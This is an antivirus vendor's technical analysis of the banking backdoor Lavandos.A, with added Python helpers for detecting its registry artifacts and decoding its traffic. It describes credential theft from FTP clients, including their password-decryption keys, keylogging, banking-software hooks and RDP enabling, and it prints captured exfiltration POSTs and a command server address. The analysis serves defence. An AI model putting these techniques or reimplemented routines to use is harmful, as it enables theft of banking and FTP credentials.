
Backdoor.Lavandos.A


First posted on 21 November 2011.
Source: BitDefender

Aliases :

There are no other names known for Backdoor.Lavandos.A.

Explanation :

The original file injects 3 dlls (setupapi.dll, dll.dll, lib.dll) and 1 driver (sfc.sys).
Into the spoolsv.exe process it injects lib.dll, dll.dll and the driver; into iexplore.exe it injects dll.dll. The files dropped are:

- depending on the browser on the infected computer: <%program file folder%>\[IExplorer | Mozilla Firefox | Opera]\setupapi.dll

- <%system folder%>\sfcfiles.dll (lib.dll).

The clean sfcfiles.dll is encrypted and packed into HKEY_LOCAL_MACHINE\SOFTWARE\SETTINGS\CryptoHash and also moved to sfcfiles.dat. The file sfcfiles.dat is deleted after a restart. The infected sfcfiles.dll has the same size and the same attributes (creation time, modification time) as the original file.

Implementation details :

The library names are encrypted, and it creates a new thread for decryption every time it needs to load a library.
Example:
0 54 8 3F 34 37 7B 31 3D 76 27 <-> kernel32
The imported function names are searched by hash. It loads the corresponding library and calculates a hash for every exported function name; if the hash equals the hash of the searched function, it retrieves that function's address.
Example:
1F515831h <-> GlobalAlloc

Ida code:



It makes sure that the code of the searched function doesn't start with an INT3 (0xCC) [anti-debugging]. If it finds an INT3 as the first byte of the function, the returned address is a wrong one and the program will crash soon after.

Ida code:



The code is obfuscated:

Ida code: compute hash function
- normal code:


- obfuscated code:




These 3 techniques are used in every component file.

The driver is loaded with ZwSetSystemInformation. This driver is kept on disk for a very short time in /drivers/sfc.sys.
It opens the browser with:
rundll32 url.dll,FileProtocolHandler http://www.google.com
Each component file has some precise tasks:

LIB.DLL

1 Download for update.

It decrypts the access server from the registry and downloads a package that contains 3 buffers packed with aplib. It seems that the server has more than one version of every file; at every request a random version of the file is chosen.
After unpacking the package, it encrypts the buffers and saves them in 3 registry values:

- HKLM\SOFTWARE\SETTINGS\CoreSettings -> encrypted dll.dll;
- HKLM\SOFTWARE\SETTINGS\ErrorControl -> encrypted shellcode;
- HKLM\SOFTWARE\SETTINGS\DriveSettings -> encrypted driver sfc.sys

It reads the server name from the registry value HKLM\SOFTWARE\SETTINGS\HashSeed. This data is kept encrypted:
http://mv[remove]o/page.php
http://atl[remove]to/page.php
http://sub[remove]ge.php
http://ser[remove]ge.php
http://allw[remove]ge.php
http://go[remove]ge.php

wireshark capture:
GET /vito/page.php?id=249D9E66C4923FA7&uid=9&link=a0&cookie=a7 HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: mv[remove]com
Connection: Keep-Alive

HTTP/1.1 200 OK
Server: nginx/0.7.65
Cache-Control: max-age=1
Content-Encoding: gzip

Examples of requests:
- GET /vito/page.php?query=249D9E66C4923FA7&hl=9&n=mozilla&do=index&client=a7&article=a8&id=unknown HTTP/1.1
- GET /vito/page.php?client=unknown&id=249D9E66C4923FA7&n=a3&var=a7&article=9&key=mozilla HTTP/1.1
- GET /vito/page.php?uid=a8&link=us&query=opera&lr=en&key=077F1DE5C2B8411D&id=a3&client=0

2 Loads the driver.
It decrypts the data from the registry value DriveSettings and loads the driver with the LoadDriver() function.

DLL.DLL

1 Download for update.

It downloads a package that contains 3 buffers packed with aplib.
After unpacking the package, it saves the contents in 2 registry values (after encrypting the corresponding buffers) and one file:
- HKLM\SOFTWARE\SETTINGS\HashSeed -> encrypted server names
- HKLM\SOFTWARE\SETTINGS\PnPData -> 15 different encrypted dll.dll
- <%system folder%>\sfcfiles.dll -> lib.dll
All 15 dlls from PnPData are injected into almost all processes.

2 Hooks some functions:

LdrGetProcedureAddress
InternetOpenA
InternetOpenW
WSAStartup

Ida Code:



3 Sends all private information:

All information is stored in the registry key HKLM\Software\Microsoft\Windows. The names of the values are hashes of the stored data. Every time a value changes (RegNotifyChangeKeyValueEx) it enumerates the values of the registry key, reads the data from the values, encrypts it and sends it.
The POST message is:

POST /vito/page.php?page=a9&lr=rnd&client=index&query=a3&do=rand&key=249D9E66C4923FA7&n=0&cookie=index HTTP/1.1
Content-Type: multipart/form-data; boundary=5c6438acde3a
Host: mv[remove].com
Content-Length: length(data)
Cache-Control: no-cache

--5c6438acde3a
Content-Disposition: form-data; name="d"; filename="dd"
Content-Type: application/octet-stream

swapcase(base64(data from value))

4 Writes commands for the other 15 dlls:

It receives data (InternetReadFile), 0x7d000 bytes maximum, and if the buffer starts with "

0000" it stores the buffer in a registry value.
The name of the command registry value is a hash computed over 9 bytes ("0000", the marker of the dll and a "\x00" byte).
The received buffer has the following structure: "[

0000][marker][command]";
Example: "[

0000][0012][0]" - the 12th dll, command '0' ("[" and "]" were added just for readability).
The commands are similar for all the dlls:

"HC" -> deletes the value HKLM\Software\Microsoft\Windows\CurrentVersion\AppData.
"CS" -> takes a screenshot; the bmp is encoded as jpeg. This picture is encrypted and saved in HKLM\Software\Microsoft\Windows\hash_string.
"BK" -> deletes the key HKLM\Software\Settings
-> encrypts the string "BYE!" and sets the value "SOFTWARE\Settings\Properties"
-> decrypts the data from the value CryptoHash
-> deletes the key HKLM\Software\Settings
-> moves the file "/sfcfiles.dll" to "/sfcfiles.dll.bak" and writes into "/sfcfiles.dll" the decrypted data from the value CryptoHash (which is the original sfcfiles.dll file)
"SK" -> switches the desktop to "DefMainWin32XAWW"
"SB" -> deletes the key HKLM\Software\Settings
-> encrypts the string "BYE!" and sets the value "SOFTWARE\Settings\Properties"
-> decrypts the data from the value CryptoHash
-> deletes the key HKLM\Software\Settings
-> moves the file "/sfcfiles.dll" to "/sfcfiles.dll.bak" and writes into "/sfcfiles.dll" the decrypted data from the value CryptoHash (which is the original sfcfiles.dll file)
-> switches the desktop to "DefMainWin32XAWW" and does the file work
"BE" -> writes a part of the command into the "Software\Microsoft\Windows\AWKeyData" value
"DU" and "LU" -> decrypt a part of the command and write it to a temp file which is executed afterwards.

SETUPAPI.DLL

Executes the shellcode.
It allocates memory for decrypting the shellcode from the ErrorControl registry value, the dll.dll from the CoreSettings value, the server names from the HashSeed value and the 15 dll.dll from PnPData, and then runs the shellcode. The shellcode loads the dll and, in the same way as the original file (based on a hash), finds the address of the DllRegisterServer function and calls it. The server names are used by dll.dll for download.
The 15 dlls from PnPData are presented below.
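A triage helper for the registry artifacts this writeup lists, as an added example (not BitDefender's code): it parses a .reg export (`reg export` output) and reports the SETTINGS values, hash-named values under HKLM\Software\Microsoft\Windows, the ManualConfigA32/A64 values and the fDenyTSConnections change described in the Dll.dll_12 section; the export below is constructed.

```python
import re

# Value names the writeup attributes to the malware, per key (keys compared lowercased).
LAVANDOS_VALUES = {
    r"hkey_local_machine\software\settings": {
        "CoreSettings", "ErrorControl", "DriveSettings", "HashSeed",
        "PnPData", "CryptoHash", "Properties",
    },
    r"hkey_local_machine\software\microsoft": {"ManualConfigA32", "ManualConfigA64"},
    r"hkey_local_machine\software\microsoft\windows\currentversion": {"AppData"},
}
# Stolen records are stored under values whose names are the hex hash (hash_string).
HASH_NAMED_KEY = r"hkey_local_machine\software\microsoft\windows"
TERMINAL_SERVER_KEY = r"hkey_local_machine\system\currentcontrolset\control\terminal server"

# Constructed sample export (not from a real infection).
SAMPLE_REG = r"""Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SOFTWARE\SETTINGS]
"CoreSettings"=hex:4d,5a,90,00
"HashSeed"=hex:ff,fe,fd

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows]
"1234abcd"=hex:fd,e3,b0
"Installed"=dword:00000001

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server]
"fDenyTSConnections"=dword:00000000
"""


def parse_reg(text: str) -> dict:
    """Minimal .reg parser: {key (lowercased): {value name: raw data text}}.
    Continuation lines of long hex values are ignored; only names matter here."""
    keys: dict = {}
    current = None
    for line in text.splitlines():
        line = line.strip()
        m = re.fullmatch(r"\[(.+)\]", line)
        if m:
            current = m.group(1).lower()
            keys.setdefault(current, {})
            continue
        m = re.fullmatch(r'"([^"]+)"=(.*)', line)
        if m and current is not None:
            keys[current][m.group(1)] = m.group(2)
    return keys


def find_indicators(reg: dict) -> list:
    """Return one line per indicator present in the parsed export."""
    hits = []
    for key, names in LAVANDOS_VALUES.items():
        present = names & set(reg.get(key, {}))
        hits.extend(f"{key}\\{n}" for n in sorted(present))
    for name in sorted(reg.get(HASH_NAMED_KEY, {})):
        if re.fullmatch(r"[0-9a-fA-F]{8}", name):
            hits.append(f"{HASH_NAMED_KEY}\\{name} (hash-named value)")
    ts = reg.get(TERMINAL_SERVER_KEY, {})
    if ts.get("fDenyTSConnections", "").lower() == "dword:00000000":
        hits.append("fDenyTSConnections=0 (RDP enabled; see the Dll.dll_12 section)")
    return hits


if __name__ == "__main__":
    for hit in find_indicators(parse_reg(SAMPLE_REG)):
        print(hit)
```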

Dll.dll_1 from PnPData

It hooks some functions:
- LdrGetProcedureAddress
- gethostbyname
- WSAAsyncGetHostByName
- connect
- send

The new LdrGetProcedureAddress checks whether the name of the function whose address is to be returned has the same hash as one of the hooked functions.
If it does, the returned address is the hooked function's address.

The new gethostbyname and the new WSAAsyncGetHostByName store the host name in a buffer.

The new connect function stores the ip address and port from the sockaddr structure in some buffers.

The new send function takes the information about the ip address, socket port, hostname, username and password from the FTP protocol.
The last 3 parts of the information (hostname, username, password) are encoded with base64. A hash is computed for this buffer and, if it does not already exist in the AppData value, it is stored. The buffer is also encrypted and kept in HKLM\Software\Microsoft\Windows\hash_string (hash_string: if the hash is 0x1234abcd the hash_string is "1234abcd").

Ida code:





Pseudocode example

storeInValue function: (pseudocode)
{
    input:
        buffer = ip port swapcase(base64(hostname)) | swapcase(base64(username)) | swapcase(base64(password))
        size_buffer = strlen(buffer_2) + 8; buffer2 = swapcase(base64(hostname)) | swapcase(base64(username)) | swapcase(base64(password))
        flag_store_hash = 1; # whether or not to store the hash in HKLM\Software\Microsoft\Windows\CurrentVersion\AppData

    buffer = [marker][buffer][400h] # the marker is the dll id
    hash_buffer = hashfunction(buffer)
    hash_string = encode_hex(hash_buffer)

    if flag_store_hash:
        AppData_hashes = RegQueryValueEx( HKLM\Software\Microsoft\Windows\CurrentVersion\AppData )
        if hash_buffer in AppData_hashes:
            return 0;
        else:
            RegSetValueEx( HKLM\Software\Microsoft\Windows\CurrentVersion\AppData, AppData_hashes + hash_buffer )

    # first rol crypt
    index = 0
    for x in buffer:
        buffer[index] = rol(x, hash_string[index % len_hash_string])
        index += 1

    # second xor crypt
    index = 0
    for x in buffer:
        buffer[index] = x ^ hash_string[index % len_hash_string]
        index += 1

    RegSetValueEx( HKLM\Software\Microsoft\Windows\hash_string, buffer )
}
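The field encoding and the two-pass storage cipher from the pseudocode above, as an added example (not the malware's or BitDefender's code), together with the inverse that a defender needs to read the stored records back. It assumes that rol() is an 8-bit rotate whose count is the ASCII value of the hash_string character (an x86 8-bit ROL reduces the count mod 8), that hash_string is the value name under HKLM\Software\Microsoft\Windows, and that the record uses the "| " separators shown; the marker prefix and 400h suffix are left out because their byte widths are not given.

```python
import base64


def field(text: str) -> str:
    """swapcase(base64(text)): the encoding applied to hostname, username and password."""
    return base64.b64encode(text.encode()).decode().swapcase()


def unfield(encoded: str) -> bytes:
    """Inverse of field(): swap the case back, then base64-decode."""
    return base64.b64decode(encoded.swapcase())


def build_ftp_record(ip: str, port: int, host: str, user: str, pw: str) -> bytes:
    # Assumption: the "| " separators follow the pseudocode literally.
    return f"{ip} {port} {field(host)}| {field(user)}| {field(pw)}".encode()


def parse_ftp_record(plain: bytes) -> dict:
    """Split a decrypted record back into its parts (base64 never contains ' ' or '|')."""
    ip, port, rest = plain.decode().split(" ", 2)
    host, user, pw = (part.strip() for part in rest.split("|"))
    return {"ip": ip, "port": int(port), "host": unfield(host).decode(),
            "user": unfield(user).decode(), "password": unfield(pw).decode()}


def _rol8(x: int, n: int) -> int:
    # Assumption: an 8-bit rotate with the count reduced mod 8, as x86 ROL r/m8 behaves.
    n %= 8
    return ((x << n) | (x >> (8 - n))) & 0xFF


def _ror8(x: int, n: int) -> int:
    n %= 8
    return ((x >> n) | (x << (8 - n))) & 0xFF


def crypt_value(plain: bytes, hash_string: str) -> bytes:
    """The two passes of the pseudocode, keyed by the hex hash text (the value name):
    rotate every byte left by the key character, then xor it with the key character."""
    key = hash_string.encode()
    out = bytearray(plain)
    for i, x in enumerate(out):          # first rol crypt
        out[i] = _rol8(x, key[i % len(key)])
    for i, x in enumerate(out):          # second xor crypt
        out[i] = x ^ key[i % len(key)]
    return bytes(out)


def decrypt_value(stored: bytes, hash_string: str) -> bytes:
    """Inverse of crypt_value(): undo the xor, then rotate right. Because the key is
    the registry value name itself, a dump of HKLM\\Software\\Microsoft\\Windows is
    enough to recover every stored record."""
    key = hash_string.encode()
    out = bytearray(stored)
    for i, x in enumerate(out):
        k = key[i % len(key)]
        out[i] = _ror8(x ^ k, k)
    return bytes(out)


if __name__ == "__main__":
    # Constructed sample: a value named "1f515831" holding one captured FTP login.
    record = build_ftp_record("10.0.0.5", 21, "ftp.example.test", "alice", "s3cret")
    blob = crypt_value(record, "1f515831")
    print(parse_ftp_record(decrypt_value(blob, "1f515831")))
```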

Dll.dll_2 from PnPData

Mainly it steals information (ip, port, username, passwords) about ftp servers. It searches the corresponding registry keys and files to get the wanted information.
All the ftp strings, registry and file names are encrypted.

1 FlashFXP :
- Software\FlashFXP\AppData
- Software\FlashFXP\DataFolder
- Software\FlashFXP\Install Path
- FlashFXP\Sites.dat
- the key for password decryption: yA36zA48dEhfrvghGRg57h5UlDv3
2 SecureFX :
- Software\VanDyke\SecureFX\Config Path
3 WS_FTP :
- Software\Ipswitch\WS_FTP\DataDir
- WS_FTP\Sites\ws_ftp.ini
4 CoreFTP :
- Software\FTPWare\CoreFTP\Sites stores passwords
5 FileZilla :
- Software\FileZilla\Install_Dir
- FileZilla.xml
- the key for password decryption: FILEZILLA1234567890ABCDEFGHIJKLMNOPQRSTUVWXYZ
6 FTP Voyager :
- .DEFAULT\Software\Rhino Software\FTP Voyager\FTP
- .DEFAULT\Software\Rhino Software\FTP Voyager\DataDirectory
- FTPVoyager.ftp
7 WCX_FTP :
- wcx_ftp.ini
8 BPFTP :
- Software\BulletProof Software\Options
- Software\BulletProof Software\SitesDir
9 GlobalSCAPE :
- Software\GlobalSCAPE\Settings\Security\SiteManagerPath
10 CoffeeCup Software :
- Software\CoffeeCup Software\Internet\Profiles
11 FTP Commander Pro :
- SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\FTP Commander Pro\UninstallString
- ftplist.txt
12 SmartFTP :
- Software\SmartFTP\Settings\General\Application Data Folder
13 LeapFTP :
- SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\LeapFTP\UninstallString
- Sites.ini
14 FarFTP :
- Software\Far\Plugins\FTP\Hosts\HostName

A buffer is created: buffer = [marker(4)][information][400h].
A hash is computed for this buffer and is kept, if it does not already exist, in HKLM\Software\Microsoft\Windows\CurrentVersion\AppData.
After the information is encrypted it is stored in HKLM\Software\Microsoft\Windows\hash_string.

Dll.dll_3 from PnPData

It hooks some functions:
- TranslateMessage
- ExtTextOutA
- TextOutW
- CreateFileW
- LdrGetProcedureAddress
- LdrLoadDll

The new TranslateMessage function acts as a keylogger. It intercepts the pressed keys and saves them in a buffer. If the class name of the foreground window contains "java.sun.awt.bifit" (bifit -> banking and finance technologies on the internet), the wParam parameter is changed to the Print Screen key code (the screenshot is saved in the clipboard).

The new ExtTextOutA and TextOutW check whether the text starts with "http" and, if so, store it in a registry value.

The new CreateFileW:
If the file name starts with "iBKS" it creates a structure containing:
- "FILE"
- 0x3EF
- length of the file name
- file name in widechar
- file data
This file contains the user's private encryption key. The purpose is to steal information about a specific public-key-based Internet banking system which is used by a large number of Russian and Ukrainian banks.
A similar buffer is created: [marker(2)][info][400h]. The hash is saved in HKLM\Software\Microsoft\Windows\CurrentVersion\AppData and the encrypted data in HKLM\Software\Microsoft\Windows\hash_string.

It starts 2 more threads:
- thread1
Creates a buffer: ["DATA1007"][flag module file name][flag: "java.sun.awt.bifit" string found], organized as [marker(2)][buffer][400h].
The hash is saved in HKLM\Software\Microsoft\Windows\CurrentVersion\AppData and the encrypted data in HKLM\Software\Microsoft\Windows\hash_string.

- thread2
It gets the data from the clipboard and saves it as "C:| data |:C". The buffer [marker(2)][info][400h] is created.
The hash is saved in HKLM\Software\Microsoft\Windows\CurrentVersion\AppData and the encrypted data in HKLM\Software\Microsoft\Windows\hash_string.

The new LdrGetProcedureAddress checks whether the name of the function whose address is to be returned has the same hash as one of the hooked functions. If it does, the returned address is the hooked function's address.

Dll.dll_4 from PnPData

It downloads new versions for the contents of the registry values CoreSettings, DriveSettings and ErrorControl.
It hooks some functions:
- CreateFileA
- recv
- LdrGetProcedureAddress
- LdrLoadDll

The new CreateFileA:
If the size of the file is less than 0xFA00, it creates a structure containing:
- "FILE"
- 0x3FB
- length of the file name
- file name
- file data
A buffer [marker(3)][data][400h] is computed and the resulting hash is saved in AppData if it doesn't already exist.
The encrypted buffer is saved in HKLM\Software\Microsoft\Windows\hash_string.
In the same manner it saves the file user.ini, all the *.cnf and *.ini files, and the file interpro.ini from the current module folder.
Inter-PRO is most used in electronic payment systems such as bank-client ones, based on web technologies and focused on serving remote clients through the Internet, or in any other system where an authorized confirmation of a client's request for service is needed (electronic trade systems, electronic insurance, paid information services, etc.).

The new recv function creates a new thread that reads and executes the command from the command registry value.
If the data received begins with "POST" it checks whether the received data contains "5c6438acde3a". If it doesn't contain this string (i.e. it is not one of its own POSTs) and it finds one of the strings "pass" or "pwd", it saves the received buffer:
- the hash for [marker(3)][buffer][400h] in HKLM\Software\Microsoft\Windows\CurrentVersion\AppData
- the encrypted buffer in HKLM\Software\Microsoft\Windows\hash_string
By saving POST request parameters (username, password) it can target the Inter-PRO banking system.

Dll.dll_5 from PnPData

It hooks some functions :
- CreateFileW
- InternetConnectA
- InternetConnectW
- InternetWriteFile
The new CreateFileW:
It checks, through hashes, whether the file name has one of the following extensions:
69806C03 => .js
630dc380 => .css
0641b482 => .dat
906dae01 => .dll
1f10c0b8 => .exe
9adad019 => .flv
c033b3c5 => .gif
17c6e3a0 => .htc
b4e835f6 => .htm
1a72cae0 => .ico
5f3b5800 => .jpg
32f00900 => .png
1e5e505c => .swf
9d74560b => .ttf
64d0302e => .txt
3c344800 => .xml

If the file name doesn't have any of these extensions, it creates a structure:
- "FILE"
- 0x3F9
- length of the file name
- file name
- file data
A buffer [marker(5)][data][400h] is computed and the resulting hash is saved in HKLM\Software\Microsoft\Windows\CurrentVersion\AppData if it doesn't already exist.
The encrypted buffer is saved in HKLM\Software\Microsoft\Windows\hash_string.

The new InternetConnectA and the new InternetConnectW:
It gets the active window and for every child window gets the text with SendMessage(hWindow, WM_GETTEXT, lenText, buffer).
If the buffer starts with "http" and contains the string "bsi.dll", it stores the link. By retrieving data from an HTTP request to bsi.dll one can collect personal information, targeting the BS-Client banking system.

It creates a thread that walks every logical drive. For removable, fixed or remote drives it searches through all the folders recursively and, if the path of a file contains one of the following strings and the string "CRYPTO", it saves the file in the same manner as before, provided the file is smaller than 0x3E800 bytes.
0328f7db => sec
2e03f00c => .000
d8003732 => cert
7fa6dfc8 => keys
87AC0CB7 => crypto

It also creates another thread that goes through the SOFTWARE\Crypto Pro\Settings\USERS key. It enumerates all the subkeys and stores all the value names and value data:
value name
value data
value name
value data
value name
value data...
This information is added to the string:
string = "FLAVURL: <the link stored by the new InternetConnectA or InternetConnectW> <information>" and will be stored:

- A buffer [marker(5)][string][400h] is computed and the resulting hash is saved in HKLM\Software\Microsoft\Windows\CurrentVersion\AppData if it doesn't already exist.
- The encrypted buffer is saved in HKLM\Software\Microsoft\Windows\hash_string.

CryptoPro CSP makes it possible to use reliable, certified cryptographic information-security tools as components of a wide range of tools and software.

The new InternetWriteFile:
If the number of bytes to write is between 5 and 0xc350, the string:
data = "FLAVURL: <the link stored by the new InternetConnectA or InternetConnectW> <the buffer to be written>" will be stored:
- A buffer [marker(5)][data][400h] is computed and the resulting hash is saved in HKLM\Software\Microsoft\Windows\CurrentVersion\AppData if it doesn't already exist.
- The encrypted buffer is saved in HKLM\Software\Microsoft\Windows\hash_string.

Dll.dll_6 from PnPData

It hooks the function CreateFileW and in the new function stores the file if the file name has the extension ".JKS", a string identified by hash (0F027E800).
The JKS file type is primarily associated with 'keytool' by Sun Microsystems, Inc. Keytool is a key and certificate management utility. It allows users to administer their own public/private key pairs and associated certificates for use in self-authentication (where the user authenticates himself/herself to other users/services) or data integrity and authentication services, using digital signatures. It also allows users to cache the public keys (in the form of certificates) of their communicating peers. A keystore is a storage facility for cryptographic keys and certificates.

Dll.dll_7 from PnPData

It hooks the RCN_R50Init function from FilialRCon.dll (used by Raiffeisen bank) to intercept private data (username, password) before encryption.

Dll.dll_9 from PnPData

It hooks a function from sks2xyz.dll.
The new function from sks2xyz.dll stores the file sign.cer (self-signed certificate used by Faktura bank).

Dll.dll_10 from PnPData

It builds an address table containing the addresses of the needed functions. Every function call is relative to the beginning of the table, to make analysis harder.
It creates multiple threads that are synchronized with mutexes.
It hooks :
- InternetReadFile
- HttpSendRequestA
- HttpSendRequestW
- InternetReadFileExA
- InternetReadFileExW
- InternetCloseHandle
- InternetQueryDataAvailable
- the callback function assigned to the handle used by asynchronous InternetConnection() function

The new functions steal and store personal information: the username and password corresponding to the current internet connection.

Ida Code:





These pieces of information are concatenated in a single string like:

BA_urlString
user=usernameString&pass=passwordString.

This string is encrypted and stored in a registry value if the URL string contains one of the words pay, payment, money, bank, /admin, faktura; the words are identified using hashes:

- 0C200C900 => pay
- 0C32DE341 => payment
- 0CCA96A40 => money
- 0FDB6305E => /admin
- 79304AC0 => bank
- 3C3B45C5 => faktura

Dll.dll_11 from PnPData

Hooked functions:
- PFXImportCertStore
- CertFindCertificateInStore

The new PFXImportCertStore:
It stores the information:
data = CRGR base64(password) | base64(subject name)i | base64(issuer name)i | base64(crypt(property of the certificate context)) |^ [marker(0xC)][data][400h]

It also creates a thread that gets and stores information about the most common system certificates.

Dll.dll_12 from PnPData

It has an advanced backdoor behaviour.
Its behaviour depends on the module it is running from, identified by hash: 0EDBCDA59h => WINLOGON.EXE.
If it's not running from winlogon.exe:

The values Software\Microsoft\ManualConfigA32 and Software\Microsoft\ManualConfigA64 keep configuration information:
- ManualConfigA32 keeps the day of the month when ManualConfigA64 was set.
- the data in ManualConfigA64 can be '0', '1' or '2'
First it checks whether ManualConfigA32 holds the current day of the month, and if it does it reads the data from ManualConfigA64.
If it doesn't find the current day in ManualConfigA32, it asks the server (by storing something in a registry value) for a value to be set in ManualConfigA64:

Ida code:



When asking for the command it does the following:
It stores the string "1111":
A buffer [marker(12h)][data][400h] is computed and the resulting hash is saved in HKLM\Software\Microsoft\Windows\CurrentVersion\AppData if it doesn't already exist.
The encrypted buffer is saved in HKLM\Software\Microsoft\Windows\hash_string.

In a wireshark capture it can be observed:

POST /vito/page.php?page=a9&lr=rnd&client=index&query=a3&do=rand&key=249D9E66C4923FA7&n=0&cookie=index HTTP/1.1
Content-Type: multipart/form-data; boundary=5c6438acde3a
Host: mv[remove].com
Content-Length: 167
Cache-Control: no-cache

--5c6438acde3a
Content-Disposition: form-data; name="d"; filename="dd"
Content-Type: application/octet-stream

eGaaadeXmthsbWaaaaaaap8aaad/aaaa

If we apply a series of functions:

"eGaaadeXmthsbWaaaaaaap8aaad/aaaa".swapcase().decode('base64').encode('hex') =>1200000031313131d207000000000000ff000000ff000000



marker   "1111"     push 7D2h  arg_0      arg_4      arg_8
12000000 [31313131] [d2070000] [00000000] [ff000000] [ff000000]
And the server responds with the following buffer "

000000120" :

[00000012][0], where 00000012 is the dll id and '0' is the current command from the server.
The other 2 commands can be '1' or '2'.
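Decoding the captured POST body and laying out the 24-byte beacon, as an added example (not the malware's or BitDefender's code). The field names follow the labels in the writeup; treating the trailing dwords as little-endian integers and the server reply's last 9 bytes as [dll id][command] are assumptions.

```python
import base64
import binascii
import struct
from dataclasses import dataclass

CAPTURED_BODY = "eGaaadeXmthsbWaaaaaaap8aaad/aaaa"   # body of the POST in the capture above


@dataclass
class Beacon:
    dll_id: int      # 0x12 -> Dll.dll_12
    marker: bytes    # b"1111"
    push_arg: int    # the 7D2h pushed before the call
    arg_0: int
    arg_4: int
    arg_8: int


def decode_body(body: str) -> bytes:
    """swapcase, then base64-decode; malformed input raises binascii.Error."""
    return base64.b64decode(body.swapcase(), validate=True)


def parse_beacon(raw: bytes) -> Beacon:
    """Lay out the 24 decoded bytes as dword, 4-char marker, dword, 3 dwords (little-endian)."""
    if len(raw) != 24:
        raise ValueError(f"expected 24 bytes, got {len(raw)}")
    return Beacon(*struct.unpack("<I4sIIII", raw))


def is_lavandos_beacon(body: str) -> bool:
    """Cheap shape check for this request: a 24-byte body carrying the "1111" marker."""
    try:
        return parse_beacon(decode_body(body)).marker == b"1111"
    except (ValueError, binascii.Error):
        return False


def parse_server_command(reply: bytes) -> tuple:
    """The reply's last 9 bytes are 8 hex digits of dll id followed by the command
    character ('0', '1' or '2'); the bytes before them are not legible in the writeup."""
    tail = reply[-9:]
    return int(tail[:8], 16), tail[8:].decode()


if __name__ == "__main__":
    print(parse_beacon(decode_body(CAPTURED_BODY)))
    print(parse_server_command(b"000000120"))   # constructed from the reply shown above
```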

If it did not receive a '1' or '2' command from the server today, it will not start the next two threads.
The threads are synchronized by mutexes: "wbfxet" for the first thread, "xzxgavonkq" for the second thread.
The threads execute the same function but, depending on the parameter, do different things.

The first thread is specialized for Remote Desktop Connections:

It changes the "SYSTEM\CurrentControlSet\Control\Terminal Server\fDenyTSConnections" value to 0 to enable remote connections. It opens the Remote Desktop service, TermService, and checks its status; if the service is not running it is started. Terminal Services is a component of Microsoft Windows (both server and client versions) that allows a user to access applications and data on a remote computer over a network using the Remote Desktop Protocol (RDP).

It sets the value

"SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\GloballyOpenPorts\List\3389:TCP" to "3389:TCP:*:Enabled:@xpsp2res.dll" to change the Windows Firewall configuration to allow access to the default port for Remote Desktop Connections.

The second thread is specialized for opening a server on a random port:

It adds the module to the authorized applications by changing the Windows Firewall configuration:
It adds the value "SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List\ModuleName"
The value data is "PathModule:*:Enabled:ModuleName".
It searches for a valid port to open a server on; it tries just 4 times to find a valid port higher than 1000.

Both threads:
It decompresses a component dll (packed with aplib and contained in the current dll), PortexClient.dll, gets the address of the MappingServer function and executes it.
The function is called with the following parameters:

Ida code:



The ip 188.165.214.122 resolves to "ns211520.ovh.net".

If it's running from winlogon.exe:

It opens a Desktop object with the "Winlogon" name and assigns it to the calling thread so it can show message boxes even if no user is logged on to the computer.
It searches for the "string_hash_computer_name" using EnumWindows -> EnumChildWindows -> GetWindowTextA.
It waits until it finds it or until it finds a secret key identified by a hash value: "9A79F222h". If that secret key is found, it shows a message box with the following information: "key", "string_hash_computer_name".
If it exists, it deletes the registry key "SYSTEM\CurrentControlSet\Control\Terminal Server\Dos" to reset the RDP timeout settings.
If the deletion succeeds it shows a message box containing: "Origami: RDP Timeout settings was modified - reconnect to apply it"
It has an option to open a cmd.exe shell: it shows a message box containing "Origami: Load cmd.exe shell?" with uType:
MB_ICONQUESTION|MB_YESNO|MB_SERVICE_NOTIFICATION.
For the "Yes" option it runs cmd.exe using WinExec.
After that a message box containing "Origami: press OK as finished to load explorer. Note - all your processes will be hided until you press OK" is displayed. For the "OK" option explorer.exe is opened and a remote connection becomes available on the infected system.
The cmd.exe can run in any scope and it isn't visible to the user.

Dll.dll_13_14 from PnPData

It stores some files (strings containing restrictions) and all the ".key" files in that folder. Files with the extension ".KEY":
contain registration information or a security code for a software program; they are often created when the program is registered and typically stored in the program's application folder or the system preferences folder.
Struct for Dll.dll_13 from PnPData:
- "FILE"
- 0x3ED
- length of the file name
- file name
- file data
A buffer [marker(13h)][data][400h] is computed and the resulting hash is saved in HKLM\Software\Microsoft\Windows\CurrentVersion\AppData if it doesn't already exist.
The encrypted buffer is saved in HKLM\Software\Microsoft\Windows\hash_string.

Struct for Dll.dll_14 from PnPData:
- "FILE"
- 0x3E9
- length of the file name
- file name
- file data
A buffer [marker(14h)][data][400h] is computed and the resulting hash is saved in HKLM\Software\Microsoft\Windows\CurrentVersion\AppData if it doesn't already exist.
The encrypted buffer is saved in HKLM\Software\Microsoft\Windows\hash_string.

It gets the active window and for every child window gets the text with SendMessage(hWindow, WM_GETTEXT, lenText, buffer).
If the buffer starts with "http" and contains the string "ibc", it stores the link.

Dll.dll_15 from PnPData

- keylogger function
- deletes the key: Software\Martin Prikryl\WinSCP 2\Configuration\Security
- stores some information about the foreground windows.
- stores some files; the file name must not contain certain strings.

The driver:

It creates a system thread that monitors changes to "\Registry\Machine\Software\Settings" and sets a flag if the function ZwNotifyChangeKey returns STATUS_NOTIFY_CLEANUP.
This status indicates that the notify-change request has been completed because the handle that made the request was closed.
It decrypts the data from the value "Properties". If it is "BYE!" it sets a flag.
It decrypts the data from the values ErrorControl, CoreSettings, HashSeed and PnPData and builds a buffer with the following structure:

buffer with registries data =
data ErrorControl
size CoreSettings
data CoreSettings
0xBA
0x0BAD1C0DEh
size data ErrorControl
size data HashSeed
data HashSeed
size PnPData
data PnPData
The key for decryption is taken from the DigitalProductId value for the values ErrorControl, CoreSettings and PnPData, and from a buffer with descending values (from 0xFF to 0x00) for the value HashSeed.
It creates a doubly linked list for retaining information about the injected processes:
LIST:
- pointer to the next element
- pointer to the previous element
- the process ID
- a pointer to the buffer with the registries data
- a pointer to a memory descriptor list for the buffer
- the starting address of the mapped pages
- the size of the buffer mentioned above
- the inject phase (initial 0)
- the entry point of the current process

